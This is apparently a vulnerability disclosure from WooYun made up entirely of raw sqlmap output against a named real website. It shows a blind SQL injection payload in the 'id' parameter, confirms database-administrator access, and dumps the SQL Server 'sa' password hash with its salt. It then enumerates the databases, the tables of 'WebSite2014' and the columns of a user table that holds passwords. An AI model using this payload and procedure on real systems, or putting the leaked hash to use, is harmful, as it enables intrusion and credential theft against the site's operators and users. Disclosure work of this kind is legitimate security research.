WooYun.org

http://www.scti.cn/Cpzs.aspx?id=62 (GET)

sqlmap identified the following injection points with a total of 568 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current user is DBA:    True
database management system users password hashes:
[*] sa [1]:
    password hash: 0x0100e91f3a04fdf44e6586452bfb91e24c7819156597b34a5bea80ef1526af4f7a2a5274a0d6581c3f0495fa8be7
        header: 0x0100
        salt: e91f3a04
        mixedcase: fdf44e6586452bfb91e24c7819156597b34a5bea
        uppercase: 80ef1526af4f7a2a5274a0d6581c3f0495fa8be7
available databases [11]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] ProductionManage
[*] ProductionPlanManage
[*] pubs
[*] scgy_cd
[*] scgyWW
[*] tempdb
[*] WebSite2014
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current database:    'WebSite2014'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: WebSite2014
[39 tables]
+----------------------------+
| dtproperties               |
| sysconstraints             |
| syssegments                |
| v_dm_location              |
| v_getdate                  |
| v_xt_dept                  |
| v_xt_organise              |
| v_xt_t_user                |
| ww_attached_property_group |
| ww_attached_property_set   |
| ww_attached_property_value |
| ww_base_info               |
| ww_content                 |
| ww_content_adjunct         |
| ww_friend_website          |
| ww_invite_adjunct          |
| ww_invite_content          |
| ww_mod                     |
| ww_query_authority         |
| ww_visits_info             |
| xt_t_data_dict             |
| xt_t_error_log             |
| xt_t_function_mod          |
| xt_t_log                   |
| xt_t_log_info              |
| xt_t_log_set               |
| xt_t_mod_access            |
| xt_t_mod_access_detail     |
| xt_t_modulehelp            |
| xt_t_organise              |
| xt_t_param_enum_type_value |
| xt_t_parameter             |
| xt_t_parameter_disp_rows   |
| xt_t_parameter_type        |
| xt_t_role                  |
| xt_t_role_popedom          |
| xt_t_shortcut_function     |
| xt_t_user                  |
| xt_t_user_role             |
+----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: WebSite2014
Table: xt_t_user
[11 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| keyid         | numeric  |
| note_date     | datetime |
| person_id     | numeric  |
| remark        | varchar  |
| sort_id       | int      |
| unitid        | varchar  |
| use_flag      | char     |
| user_account  | varchar  |
| user_name     | varchar  |
| user_password | varchar  |
| userid        | varchar  |
+---------------+----------+